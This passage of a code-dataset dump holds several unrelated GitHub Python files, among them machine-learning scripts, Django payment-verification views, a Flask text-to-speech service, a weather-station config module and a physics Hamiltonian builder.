x 3 = 3072\n# new shape: [3000, 3072]\ndata = data.reshape((data.shape[0], 3072))\n\n# show some information on memory consumption of the images\n# compute the number of bytes the array consumes and convert it to MB\nprint(\"[INFO] Features matrix: {:.1f} MB\".format(data.nbytes / (1024 * 1000.0)))\n\n# encode the labels as integers; one unique integer per class\nle = LabelEncoder()\nlabels = le.fit_transform(labels)\n\n# partition the data into training and testing splits using 75% of\n# the data for training and the remaining 25% for testing\n\ntrainX, testX, trainY, testY = train_test_split(data, labels, test_size = 0.25, random_state = 42)\n\n# train and evaluate a k-NN classifier on the raw pixel intensities\nprint(\"[INFO] Evaluating k-NN classifier...\")\nmodel = KNeighborsClassifier(n_neighbors = args[\"neighbors\"], n_jobs = args[\"jobs\"])\nmodel.fit(trainX, trainY)\n# classification_report returns a table containing evaluation metrics\n# target_names - opti onal, names of the class labels\nprint(classification_report(testY, model.predict(testX), target_names = le.classes_))\n\n","repo_name":"KshitizS26/computer-vision-deep-learning","sub_path":"knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":3378,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"1333347318","text":"from decouple import config\nimport json\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.response import Response\nfrom rest_framework import generics, status\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.authentication import TokenAuthentication\n\nfrom order.models import Order\nfrom product.models import Product\nfrom order.models import ProductOrderList\n\n\nimport paypalrestsdk\nimport razorpay\n\n\n# Create your views here.\n\ndef reduce_from_stock(saved_order_instance):\n try:\n\n # reduce products from stock\n\n product_list_instances = ProductOrderList.objects.filter(\n order_details=saved_order_instance.id)\n for product in product_list_instances:\n product_instance = Product.objects.get(id=product.product.id)\n product_instance.stock -= product.quantity\n product_instance.save()\n\n return True\n except:\n return False\n\n\npaypalrestsdk.configure({\n \"mode\": \"sandbox\", # sandbox or live\n \"client_id\": config('PAYPAL_CLIENT_ID'),\n \"client_secret\": config('PAYPAL_SECRET_ID')})\n\n\nclass PaypalExecute(generics.GenericAPIView):\n permission_classes = (IsAuthenticated,)\n authentication_classes = (TokenAuthentication,)\n\n def get(self, request, *args, **kwargs):\n pay_id = request.GET.get('paymentId', '')\n payer_id = request.GET.get('PayerID', '')\n\n payment = paypalrestsdk.Payment.find(pay_id)\n\n order_id = int(payment['transactions'][0]['custom'])\n order_instance = Order.objects.get(id=order_id)\n\n if float(order_instance.total_amt) == float(payment['transactions'][0]['amount']['total']):\n if payment.execute({\"payer_id\": payer_id}):\n print(\"Payment execute successfully\")\n order_instance.paid = True\n order_instance.save()\n return Response({'response': \"Payment executed successfully\"}, status=status.HTTP_200_OK)\n else:\n print(payment.error) # Error Hash\n\n return Response({'error': \"Invalid payment! Amount does not match.\"}, status=status.HTTP_409_CONFLICT)\n\n\nclass RazorpayVerification(generics.GenericAPIView):\n\n permission_classes = (IsAuthenticated,)\n authentication_classes = (TokenAuthentication,)\n\n def post(self, request, *args, **kwargs):\n payload = json.loads(request.body)\n saved_order_instance = Order.objects.get(id=payload['order_id'])\n if request.user != saved_order_instance.user:\n return Response({\"error\": \"Invalid user\"}, status=status.HTTP_401_UNAUTHORIZED)\n\n # generating and comparing the payment signature\n\n client = razorpay.Client(\n auth=(config(\"RAZORPAY_KEY_ID\"), config(\"RAZORPAY_SECRET_ID\")))\n\n params_dict = {\n 'razorpay_order_id': saved_order_instance.generated_id,\n 'razorpay_payment_id': payload['razorpay_payment_id'],\n 'razorpay_signature': payload['razorpay_signature']\n }\n verified = client.utility.verify_payment_signature(\n params_dict) # returns None when successful and 0 when failed\n if verified:\n return Response({\"error\": \"Invalid Payment Signature. Verification Failed\"}, status=status.HTTP_402_PAYMENT_REQUIRED)\n\n # change paid stauts here\n saved_order_instance.paid = True\n saved_order_instance.save()\n if reduce_from_stock(saved_order_instance):\n return Response({\"response\": \"Successfully verified\"}, status=status.HTTP_200_OK)\n","repo_name":"MoonC432/basic-ecom","sub_path":"backend/payment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38672890392","text":"class Solution(object):\n def maxScore(self, cardPoints, k):\n \"\"\"\n :type cardPoints: List[int]\n :type k: int\n :rtype: int\n \"\"\"\n# res=[]\n# l=0\n# sumMax=max(sum(cardPoints[:k]),sum(cardPoints[-k:]))\n# r=len(cardPoints)\n# def sumiscore(cardPoints,k,sumi,l,r):\n# if k==0 or l>=r or sumi>=sumMax:\n# res.append(sumi)\n# return \n# sumiscore(cardPoints[1:],k-1,sumi+cardPoints[0],l+1,r) \n# sumiscore(cardPoints[:-1],k-1,sumi+cardPoints[-1],l,r-1) \n \n# sumiscore(cardPoints,k,0,l,r)\n# return max(res)\n\n \n i=0\n sumTotal=sum(cardPoints)\n res=sumTotal\n n=len(cardPoints)\n sumi = sum(cardPoints[:n-k])\n for i in range(len(cardPoints)-(n-k)+1):\n if sumi20}'.format(nome))\n#O :>20 alinha na posição 20 o nome. Podemos alinhar a esquerda :<20 Podemos centralizar :^20. Podemos centralizar colocando iguais em volta :=^20\n#se você quer trabalhar apenas com 2 casas decimais flutuantes :.3f\n#se você não quiser quebrar a linha no print você pode coloca, end=''\n\nn1 = int(input('Digite um valor'))\nn2 = int(input('Digite outro valor valor'))\ns=n1+n2\nm=n1*n2\nd=n1/n2\ndi=n1//n2\ne=n1**n2\nprint('A soma é {}, a multiplicação é {}, a divisão é {:.3f}'.format(s,m,d), end='')\nprint('Divisão inteira {} e pontência{}'.format(di,e))","repo_name":"emersontop/python3","sub_path":"aulas/aula007.py","file_name":"aula007.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70177079092","text":"# -*- coding: cp949 -*-\nimport json\nimport sys\nimport time\nfrom docutils.nodes import header\nfrom numpy import finfo\nimport pandas as pd\nfrom source.distributed import apply_gradient_allreduce\nfrom speech_synthesis import Text2Speech\nfrom source.db.app import TTS\nsys.path.append('source/waveglow/')\nimport numpy as np\nfrom scipy.io import wavfile\nfrom flask import Flask, render_template, request\nfrom source.hparams import create_hparams\nhparams=create_hparams()\nfrom source.model import Tacotron2\nfrom translation import Korean2Dialect\n\n\n\n\ndef save_wav(wav, path, sr):\n wav *= 32767 / max(0.01, np.max(np.abs(wav)))\n # proposed by @dsmiller\n wav = wav.astype(np.int16)\n wavfile.write(path, sr, wav)\n return wav\n\n\ndef uri_mapping(speaker: str, model_type: str, attitude_style: str) -> str:\n uri = 'source/outdir'\n if speaker.strip() == '남성':\n uri += '/male'\n elif speaker.strip() == '여성':\n uri += '/female'\n else:\n print('speaker {}'.format(speaker))\n print('uri {}'.format(uri))\n raise NotImplementedError(\"speaker is not implemented\")\n\n if model_type.strip() == '표준어':\n uri += '/standard'\n elif model_type.strip() == '제주도':\n uri += '/jeju'\n elif model_type.strip() == '대구':\n uri += '/daegu'\n elif model_type.strip() == '경상북도':\n uri += '/gyeonsangbuk'\n elif model_type.strip() == '부산':\n uri += '/busan'\n else:\n print('uri {}'.format(uri))\n print('model_type {}'.format(model_type))\n raise NotImplementedError(\"model type is not implemented\")\n\n\n\n\ndef clean_text(txt:str)->list:\n ### transform english char to korean text\n transform_dict = {'a':'에이','b':'비','c':'시','d':'디','e':'이','f':'에프','g':'지','h':'에이치','i':'아이','j':'제이','k':'케이','l':'엘','m':'엠',\n 'n':'엔','o':'오','p':'피', 'q':'큐','r':'아르','s':'에스','t':'티','u':'유','v':'브이','w':'더블유','x':'엑스','y':'와이','z':'제트',\n u\"'\":u'\"', '(':', ', ')':', ', '#':'샵', '%':'프로', '@':'고팽이', '+':'더하기', '-':'빼기', ':':'나누기', '*':'별'}\n ### remove not allowed chars\n not_allowed_characters = list('^~')\n txt = ''.join(i for i in txt if not i in not_allowed_characters)\n txt = txt.lower().strip()\n ### transform special char to hangul\n for k,v in transform_dict.items():\n txt=txt.replace(k, v).replace(' .', '.').replace(' ?', '?').strip()\n from koalanlp import API\n from koalanlp.proc import SentenceSplitter\n from koalanlp.Util import initialize, finalize\n #### split paragraph to list of sentences\n initialize(hnn=\"2.1.3\")\n splitter = SentenceSplitter(api=API.HNN)\n paragraph = splitter(txt)\n finalize()\n # return paragraph\n txt_list=[]\n import string\n max_len=60\n for s in paragraph:\n txt_ = s.translate(str.maketrans('', '', string.punctuation.replace(',','')))\n txt_=txt_.strip()\n\n while True:\n if ',,' in txt_:\n txt_=txt_.replace(',,',',')\n else:\n break\n\n if len(txt_.replace(',','').replace(' ','').strip())>0:\n txt_ = txt_.replace(' ,', ',').replace(',', ', ')\n if len(txt_) >= max_len:\n start = 0\n while True:\n if start>=len(txt_):\n break\n else:\n sub_txt = txt_[start:start+max_len]\n start += max_len\n if not (sub_txt.endswith('.') or sub_txt.endswith('?') or sub_txt.endswith('!')):\n sub_txt = sub_txt + '.'\n txt_list.append(sub_txt.strip())\n else:\n if not (txt_.endswith('.') or txt_.endswith('?') or txt_.endswith('!')):\n txt_ = txt_ + '.'\n txt_list.append(txt_.strip())\n return txt_list\n\ndef load_model(hparams):\n model = Tacotron2(hparams).cuda()\n if hparams.fp16_run:\n model.decoder.attention_layer.score_mask_value = finfo('float16').min\n if hparams.distributed_run:\n model = apply_gradient_allreduce(model)\n return model\n\n\n## =============================== load pretrained model =======================================\n### tacotron\n# =============================== define web app =======================================\napp = Flask(__name__)\n# app.config['SQLALCHEMY_DATABASE_URI']= DB_URL\n# db = SQLAlchemy(app)\n\njeju_translation = Korean2Dialect('jeju', beam_search=False, k=0) # 제주 번역 클래스 선언\ngyeong_translation = Korean2Dialect('gyeong', beam_search=False, k=0) # 경상 번역 클래스 선언\njeon_translation = Korean2Dialect('jeon', beam_search=False, k=0) # 전라 번역 클래스 선언\n\njeju_speech = Text2Speech('제주') # 제주 음성합성 클래스 선언\ngyeong_speech = Text2Speech('경상') # 경상 음성합성 클래스 선언\njeon_speech = Text2Speech('전라') # 전라 음성합성 클래스 선언\n\n\n@app.route('/ml-inference', methods=['POST'])\ndef ml_inference():\n print('====== Synthesizing ======')\n print(request.form)\n total_time = time.time()\n gender = str(request.form['gender-options']) # [0, 1] == ['남자', '여자']\n model_type = str(request.form['model-type-options']) # [0, 1, 2] = ['제주도', '경상도', '전라도]\n # 사투리 결정\n # ##### select model\n if model_type == '표준':\n ###표준\n korean2dialect = jeju_translation\n text2speech = jeju_speech\n elif model_type == '제주':\n ## with jeju voice, need translation (standard --> jeju language)\n korean2dialect = jeju_translation\n text2speech = jeju_speech\n elif model_type == '경상':\n ##제주\n korean2dialect = gyeong_translation\n text2speech = gyeong_speech\n elif model_type == '전라':\n korean2dialect = jeon_translation\n text2speech = jeon_speech\n else:\n return app.response_class(response=None, status=404, mimetype='application/json')\n\n korean = request.form['input-text'] # 표준어 Input\n # dialect = korean2dialect.transform(korean) # 번역\n dialect = korean # 번역\n txt_list = clean_text(txt=dialect) # 번역된 텍스트 클리닝\n wav_file, error_log = text2speech.forward(txt_list) # 텍스트 -> wav file\n error_sentences = []\n for k, v in error_log.items():\n if v==True:\n error_sentences.append(k)\n error_sentences = '|'.join(error_sentences)\n return_data = {'translated_text': dialect, 'audio_stream': wav_file}\n res = app.response_class(response=json.dumps(return_data), status=200, mimetype='application/json')\n ip = request.remote_addr\n print('Total time(translation + synthesize): {}'.format(time.time() - total_time))\n tts = TTS(dialect_type=model_type, korean=korean, dialect=dialect,ip=ip, error=error_sentences)\n # db.session.add(tts)\n # db.session.commit()\n return res\n\n\ndef test():\n test_txts = read_ejn(file_path=r'source/filelists/donate_comment_500000.csv')\n print(request.form)\n gender = \"male\"\n model_type = \"경상\"\n\n # ##### select model\n if model_type=='표준':\n ###표준\n korean2dialect = jeju_translation\n text2speech = jeju_speech\n elif model_type=='제주':\n ## with jeju voice, need translation (standard --> jeju language)\n korean2dialect = jeju_translation\n text2speech = jeju_speech\n elif model_type=='경상':\n ##제주\n korean2dialect = gyeong_translation\n text2speech = gyeong_speech\n elif model_type=='전라':\n korean2dialect = jeon_translation\n text2speech = jeon_speech\n else:\n return app.response_class(response=None,status=404,mimetype='application/json')\n\n test_result = []\n save_flag=0\n for row in test_txts.itertuples():\n korean = row[1]\n dialect = korean2dialect.transform(korean) # 번역\n txt_list = clean_text(txt=dialect) # 번역된 텍스트 클리닝\n print(txt_list)\n try:\n base_64_wav_file, audio = text2speech.forward(txt_list) # 텍스트 -> wav file\n test_result.append([korean]+ txt_list + [len(txt_list[0]), audio.shape[0]])\n except:\n test_result.append([korean]+ txt_list +[len(txt_list[0]), None])\n\n save_flag +=1\n if save_flag%100==0:\n test_result_df = pd.DataFrame(test_result, columns=['ejn_text', 'trans_text','text_length', 'audio_length'])\n test_result_df.to_csv('test_result.csv')\n test_result_df = pd.DataFrame(test_result, columns=['ejn_text', 'text', 'text_length', 'audio_length'])\n test_result_df.to_csv('test_result.csv')\n # return_data = {'translated_text': dialect, 'audio_stream': wav_file}\n # res = app.response_class(response=json.dumps(return_data), status=200, mimetype='application/json')\n return True\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\ndef read_ejn(file_path):\n # file_path = r'source/filelists/donate_comment_500000.csv'\n ejn_df = pd.read_csv(file_path, encoding='utf-8', header=None)\n ejn_df=ejn_df.sample(frac=1)\n ejn_df=ejn_df.iloc[:5000,:]\n text = ejn_df.iloc[:,0]\n ejn_df['length'] = text.str.len()\n ejn_df.sort_values('length', ascending=False, inplace=True)\n return ejn_df","repo_name":"Thien223/TTS_webservice","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17681365107","text":"\"\"\"Application configuration data.\"\"\"\n\nimport logging\nimport os\nimport os.path\nfrom abc import abstractmethod\nfrom enum import Enum\nfrom typing import Annotated, Dict, List, Literal, Optional, Union\n\nimport yaml\nfrom pydantic import BaseModel, Field, validator\n\nfrom .providers import (\n WeatherProvider,\n accuweather,\n ambientwx,\n noaa,\n openweather,\n wunderground,\n)\n\nlogger = logging.getLogger(__name__)\n\n\nclass Units(str, Enum):\n IMPERIAL = \"imperial\"\n METRIC = \"metric\"\n\n\nclass StationConfigBase(BaseModel):\n \"\"\"Base configuration for weather providers.\"\"\"\n\n __providers__ = {}\n\n name: str\n provider: WeatherProvider\n update_interval: Optional[int] = None\n\n @abstractmethod\n def initialize(self):\n \"\"\"Initialize a new instance of the station based on this config.\"\"\"\n\n\nclass AccuWeatherConfig(StationConfigBase):\n \"\"\"Station configuration for AccuWeather.\"\"\"\n\n api_key: str\n location: Union[str, int]\n provider: Literal[WeatherProvider.ACCUWEATHER]\n\n def initialize(self):\n \"\"\"Initialize a new AccuWeather station based on this config.\"\"\"\n\n return accuweather.Station(\n name=self.name,\n api_key=self.api_key,\n location=self.location,\n )\n\n\nclass AmbientWeatherConfig(StationConfigBase):\n \"\"\"Station configuration for Ambient Weather Network.\"\"\"\n\n app_key: str\n user_key: str\n device_id: str\n provider: Literal[WeatherProvider.AMBIENT]\n\n def initialize(self):\n \"\"\"Initialize a new Ambient Weather station based on this config.\"\"\"\n\n return ambientwx.Station(\n name=self.name,\n app_key=self.app_key,\n user_key=self.user_key,\n device_id=self.device_id,\n )\n\n\nclass NOAA_Config(StationConfigBase):\n \"\"\"Station configuration for NOAA weather.\"\"\"\n\n station: str\n provider: Literal[WeatherProvider.NOAA]\n\n def initialize(self):\n \"\"\"Initialize a new NOAA station based on this config.\"\"\"\n\n return noaa.Station(\n name=self.name,\n station=self.station,\n )\n\n\nclass OpenWeatherMapConfig(StationConfigBase):\n \"\"\"Station configuration for OpenWeatherMap.\"\"\"\n\n api_key: str\n latitude: float\n longitude: float\n provider: Literal[WeatherProvider.OPENWEATHERMAP]\n\n def initialize(self):\n \"\"\"Initialize a new OpenWeatherMap station based on this config.\"\"\"\n\n return openweather.Station(\n name=self.name,\n api_key=self.api_key,\n latitude=self.latitude,\n longitude=self.longitude,\n )\n\n\nclass WeatherUndergroundConfig(StationConfigBase):\n \"\"\"Station configuration for Weather Underground.\"\"\"\n\n api_key: str\n station_id: str\n provider: Literal[WeatherProvider.WUNDERGROUND]\n\n def initialize(self):\n \"\"\"Initialize a new Weather Underground PWS based on this config.\"\"\"\n\n return wunderground.Station(\n name=self.name,\n api_key=self.api_key,\n station_id=self.station_id,\n )\n\n\nStationConfig = Annotated[\n Union[\n AccuWeatherConfig,\n AmbientWeatherConfig,\n NOAA_Config,\n OpenWeatherMapConfig,\n WeatherUndergroundConfig,\n ],\n Field(discriminator=\"provider\"),\n]\n\n\nclass AppConfig(BaseModel):\n \"\"\"Application configuration for wxdat.\"\"\"\n\n database: str = \"sqlite:///wxdat.db\"\n update_interval: int = 300\n stations: List[StationConfig] = []\n units: Units = Units.METRIC\n logging: Optional[Dict] = None\n metrics: Optional[int] = None\n\n @validator(\"database\", pre=True, always=True)\n def _check_env_for_database_str(cls, val):\n env = os.getenv(\"WXDAT_DATABASE_URL\", None)\n return val if env is None else env\n\n @property\n def DATABASE_CONN_STRING(self):\n return self.database\n\n @classmethod\n def load(cls, config_file):\n if not os.path.exists(config_file):\n raise FileNotFoundError(f\"config file does not exist: {config_file}\")\n\n with open(config_file) as fp:\n data = yaml.load(fp, Loader=yaml.SafeLoader)\n conf = AppConfig(**data)\n\n logger = cls._configure_logging(conf)\n logger.info(\"loaded AppConfig from: %s\", config_file)\n\n return conf\n\n @classmethod\n def _configure_logging(cls, conf):\n import logging.config\n\n if conf.logging is None:\n # using dictConfig() here replaces the existing configuration of all loggers\n # this approach is more predictable than logging.basicConfig(level=logging.WARN)\n logconf = {\"version\": 1, \"incremental\": False, \"root\": {\"level\": \"WARN\"}}\n\n else:\n logconf = conf.logging\n\n logging.config.dictConfig(logconf)\n\n return logging.getLogger()\n","repo_name":"jheddings/wxdat","sub_path":"src/wxdat/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4810,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"12491911081","text":"import torch\nimport numpy as np\nfrom DataLoader import load_BRCA\nfrom train import trainnet\nfrom km_logrank import km_logrank_picture\n\n\ndevice_id = 0\ntorch.cuda.set_device(device_id)\ndtype = torch.FloatTensor\n\n''' Net Settings'''\nfeature_size = 250 \nclass_size = 1 \nlatent_size = 10 \n\n''' Initialize '''\nInitial_Learning_Rate = [0.03, 0.01, 0.001, 0.00075]\nL2_Lambda = [0.1, 0.01, 0.005, 0.001]\nnum_epochs =30 ###for grid search\nNum_EPOCHS =50 ###for training\n\n''' load data \nneed to provide the absolute file path.\n'''\nname='BRCA'\nx_train, ytime_train, yevent_train = load_BRCA(f\"/Data/ljy/single_cox250/{name}_train_250.csv\", dtype)\t#\nx_valid, ytime_valid, yevent_valid = load_BRCA(f\"/Data/ljy/single_cox250/{name}_vaild_250.csv\", dtype)\nx_test, ytime_test, yevent_test = load_BRCA(f\"/Data/ljy/single_cox250/{name}_test_250.csv\", dtype)\n\nopt_l2_loss = 0\nopt_lr_loss = 0\nopt_loss = torch.Tensor([float(\"Inf\")])\n###if gpu is being used\nif torch.cuda.is_available():\n\topt_loss = opt_loss.cuda()\n###\nopt_c_index_va = 0\nopt_c_index_tr = 0\n\n###grid search the optimal hyperparameters using train and validation data\nfor l2 in L2_Lambda:\n\tfor lr in Initial_Learning_Rate:\n\t\tloss_train, loss_valid, c_index_tr, c_index_va , _ = trainnet(x_train, ytime_train, yevent_train, \\\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tx_valid, ytime_valid, yevent_valid, \\\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tfeature_size, class_size, latent_size, \\\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tlr, l2, num_epochs, name)\n\t\tif loss_valid < opt_loss:\n\t\t\topt_l2_loss = l2\n\t\t\topt_lr_loss = lr\n\t\t\topt_loss = loss_valid\n\t\t\topt_c_index_tr = c_index_tr\n\t\t\topt_c_index_va = c_index_va\n\t\tprint (\"L2: \", l2, \"LR: \", lr, \"Loss in Validation: \", loss_valid,\"opt_c_index_tr:\",opt_c_index_tr,\"opt_c_index_va:\",opt_c_index_va)\n\n\n\n###train CVaDeS with optimal hyperparameters using train data, and then evaluate the trained model with test data\n###Note that test data are only used to evaluate the trained CVaDeS\nloss_train, loss_test, c_index_tr, c_index_te, evel_pred = trainnet(x_train, ytime_train, yevent_train, \\\n\t\t\t\t\t\t\tx_test, ytime_test, yevent_test, \\\n\t\t\t\t\t\t\tfeature_size, class_size, latent_size, \\\n\t\t\t\t\t\t\topt_lr_loss, opt_l2_loss, Num_EPOCHS, name)\n\nkm_logrank_picture(evel_pred.cpu(),ytime_test.cpu(),yevent_test.cpu())\nprint (\"Optimal L2: \", opt_l2_loss, \"Optimal LR: \", opt_lr_loss)\nprint(\"C-index in Test: \", c_index_te)\n","repo_name":"ljy66666/CVaDeS","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16600243172","text":"\"\"\"상위 카테고리에서 나눠지는 여러개의 하위 카테고리에 대한 Test를 거치고 싶을 때\"\"\"\r\n\r\nimport numpy as np\r\nimport random\r\nfrom keras.preprocessing import image\r\nimport os\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom keras import models\r\nfrom keras import layers\r\nfrom keras import optimizers\r\nimport keras\r\n\r\nbase_dir = 'D:/dataset/'\r\ntrain_dir = os.path.join(base_dir, 'Trainset')\r\n\r\ntest='D:/dataset/Testset/Outer/'\r\ntest_Outer_Blouson_dir=os.path.join(test,'Outer_Blouson')\r\ntest_Outer_Bluejean_jacket_dir=os.path.join(test,'Outer_Bluejean_jacket')\r\ntest_Outer_Cardigan_dir=os.path.join(test,'Outer_Cardigan')\r\ntest_Outer_Nylon_Jacket_dir=os.path.join(test,'Outer_Nylon_Jacket')\r\ntest_Outer_Padding_dir=os.path.join(test,'Outer_Padding')\r\ntest_Outer_Suit_jacket_dir=os.path.join(test,'Outer_Suit_jacket')\r\ntest_Outer_ThinCoat_dir=os.path.join(test,'Outer_ThinCoat')\r\ntest_Outer_WinterCoat_dir=os.path.join(test,'Outer_WinterCoat')\r\n\r\nepochs = 3\r\nimg_width, img_height = 220, 220\r\ntrain_size = 800\r\nconv_base = keras.applications.InceptionV3(weights='imagenet',include_top = False,input_shape=(img_width, img_height, 3))\r\nconv=conv_base.output.shape\r\n\r\nconv_base.summary()\r\ndatagen = ImageDataGenerator(rescale=1. / 255)\r\nbatch_size = 16\r\n\r\n\r\ndef extract_features(directory, sample_count): #라벨링\r\n features = np.zeros(shape=(sample_count, conv[1], conv[2], conv[3]))\r\n labels = np.zeros(shape=(sample_count,3))\r\n generator = datagen.flow_from_directory(directory,\r\n target_size=(img_width, img_height),\r\n batch_size=batch_size,\r\n class_mode='categorical')\r\n i = 0\r\n for inputs_batch, labels_batch in generator:\r\n print(inputs_batch.shape,i)\r\n features_batch = conv_base.predict(inputs_batch)\r\n features[i * batch_size : (i + 1) * batch_size] = features_batch\r\n labels[i * batch_size: (i + 1) * batch_size] = labels_batch\r\n i += 1\r\n if i * batch_size >= sample_count:\r\n break\r\n return features, labels\r\ntrain_features, train_labels = extract_features(train_dir, train_size)\r\n\r\n\r\nmodel = models.Sequential()\r\nmodel.add(layers.Flatten(input_shape=train_features.shape[1:]))\r\nmodel.add(layers.Dense(256, activation='relu', input_dim=(train_features.shape[1]*train_features.shape[2]*train_features.shape[3])))\r\nmodel.add(layers.Dropout(0.25))\r\nmodel.add(layers.Dense(3, activation='softmax'))\r\nmodel.summary()\r\nmodel.compile(optimizer=optimizers.Adam(0.001),loss='categorical_crossentropy',)\r\nhistory = model.fit(train_features, train_labels,batch_size=batch_size,epochs=epochs)\r\nmodel.save('JH_nonFine.h5')\r\n# 빌드 모델\r\n\r\n\r\n\r\ndef visualize_predictions(classifier, n_cases): #\r\n for i in range(0,n_cases):\r\n path = random.choice([test_Outer_Blouson_dir,test_Outer_Bluejean_jacket_dir,test_Outer_Cardigan_dir,test_Outer_Nylon_Jacket_dir,test_Outer_Padding_dir,test_Outer_Suit_jacket_dir,test_Outer_ThinCoat_dir,test_Outer_WinterCoat_dir]) #테스트데이터 경로 랜덤으로 선택\r\n random_img = random.choice(os.listdir(path))\r\n img_path = os.path.join(path, random_img)# 테스트 이미지 랜덤으로 선택\r\n img = image.load_img(img_path, target_size=(img_width, img_height)) #랜덤으로 가져온 데이터 전처리\r\n img_tensor = image.img_to_array(img)\r\n img_tensor /= 255. #데이터 0~1사이값으로 전처리\r\n features = conv_base.predict(img_tensor.reshape(1,img_width, img_height, 3))\r\n try:\r\n prediction = classifier.predict_classes(features)\r\n except:\r\n prediction = classifier.predict_classes(features.reshape(1, train_features.shape[1]*train_features.shape[2]*train_features.shape[3]))\r\n\r\n print(img_path)\r\n print(prediction)\r\n if prediction == 0:\r\n print('Onepiece')\r\n elif prediction == 1:\r\n print('Outer')\r\n elif prediction == 2:\r\n print('Pants')\r\n elif prediction == 3:\r\n print('Skirt')\r\n else:\r\n print('Top')\r\n \r\n \r\nvisualize_predictions(model, 10)","repo_name":"dlwlsdn201/2020CapstonDesign_OOTD-Project","sub_path":"JH_CNN_Outer.py","file_name":"JH_CNN_Outer.py","file_ext":"py","file_size_in_byte":4256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39695211352","text":"import matplotlib.pyplot as plt \n\nx = [1, 2, 3, 4, 5] \n\n\ny = [10, 24, 36, 40, 5] \n\n\nxyz = ['one', 'two', 'three', 'four', 'five'] #used to assign name to each bar\n\n \nplt.bar(x, y, tick_label = xyz, \n\t\twidth = 0.8, color = ['red', 'green']) \n\n\nplt.xlabel('x - axis') \n \nplt.ylabel('y - axis') \n\nplt.title('bar chart!') \n\n\nplt.show()\n","repo_name":"msbmihir/Python-Projects","sub_path":"Graph/BarGraph.py","file_name":"BarGraph.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34819002620","text":"from typing import Optional\n\nfrom zquantum.core.openfermion import save_interaction_operator\nfrom zquantum.core.utils import ValueEstimate, save_value_estimate\nfrom zquantum.solid_state.fermi_hubbard import (\n calculate_exact_density_of_energy_for_2_D_fermi_hubbard,\n compute_energy_density,\n get_fermi_hubbard_hamiltonian,\n)\n\n\ndef calculate_and_save_energy_density(\n energy: float, x_dimension: int, y_dimension: int, chemical_potential: float\n):\n \"\"\"Calculates and saves energy density from energy.\"\"\"\n energy_density = compute_energy_density(\n energy, x_dimension, y_dimension, chemical_potential\n )\n val_estimate = ValueEstimate(energy_density)\n save_value_estimate(val_estimate, \"value-estimate.json\")\n\n\ndef calculate_and_save_exact_density_of_energy_for_2_D_fermi_hubbard(\n tunneling_energy: float,\n coulomb_interaction_energy: float,\n x_dimension: Optional[int] = None,\n y_dimension: int = 1,\n magnetic_field: float = 0.0,\n) -> float:\n \"\"\"\n Calculates and saves the exact density of energy for 1D Fermi-Hubbard model\n of finite length.\n It works only for a half-filling case.\n\n Args:\n tunneling_energy: Tunneling energy\n coulomb_interaction_energy: Coulomb interaction energy.\n x_dimension: x dimension of the FH model\n y_dimension: y dimension of the FH model\n magnetic_field: strength of the magnetic field\n\n \"\"\"\n energy_density = calculate_exact_density_of_energy_for_2_D_fermi_hubbard(\n tunneling_energy,\n coulomb_interaction_energy,\n x_dimension,\n y_dimension,\n magnetic_field,\n )\n\n val_estimate = ValueEstimate(energy_density)\n save_value_estimate(val_estimate, \"value-estimate.json\")\n\n\ndef build_and_save_fermi_hubbard_hamiltonian(\n x_dimension,\n y_dimension,\n tunneling,\n coulomb,\n chemical_potential=0.0,\n magnetic_field=0.0,\n periodic=True,\n spinless=False,\n particle_hole_symmetry=False,\n):\n \"\"\"\n Generates and saves the Hamiltonian corresponding to the Fermi-Hubbard Model for\n a number of interacting fermions on a rectangular lattice of dimensions\n x_dimension times y_dimension.\n\n The Hamiltonian has the form:\n\n H = -t \\sum_{} \\sum_{\\sigma} (a^{\\dagger}_{i,\\sigma} a_{j,\\sigma}\n + a^{\\dagger}_{j,\\sigma} a_{i,\\sigma})\n + U \\sum_{i} a^{\\dagger}_{i,up} a_{i,up}a^{\\dagger}_{i,down} a_{i,down}\n + \\mu \\sum_{i} \\sum_{\\sigma} a^{\\dagger}_{i,\\sigma} a_{i,\\sigma}\n - h \\sum_{i} (a^{\\dagger}_{i,up} a_{i,up} - a^{\\dagger}_{i,down} a_{i,down})\n where \\sigma is the spin (up or down)\n t is the tunneling amplitude\n U is the Coulomb potential\n \\mu is the chemical potential\n h is the magnetic field\n\n Args:\n x_dimension (int): The width of the grid.\n y_dimension (int): The height of the grid.\n tunneling (float): The tunneling amplitude :math:`t`.\n coulomb (float): The attractive local interaction strength :math:`U`.\n chemical_potential (float, optional): The chemical potential\n :math:`\\mu` at each site. Default value is 0.\n magnetic_field (float, optional): The magnetic field :math:`h`\n at each site. Default value is 0. Ignored for the spinless case.\n periodic (bool, optional): If True, add periodic boundary conditions,\n in both directions. Default is True.\n spinless (bool, optional): If True, return a spinless Fermi-Hubbard\n model. Default is False.\n particle_hole_symmetry (bool, optional): If False, the repulsion\n term corresponds to:\n \\sum_{i} a^{\\dagger}_{i,up} a_{i,up}a^{\\dagger}_{i,down} a_{i,down}\n If true, it corresponds to:\n \\sum_{i} (a^{\\dagger}_{i,up} 